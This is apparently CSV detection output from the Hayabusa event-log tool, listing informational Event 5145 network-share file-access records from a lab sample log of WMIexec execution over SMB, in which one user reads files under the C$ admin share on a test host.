admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 
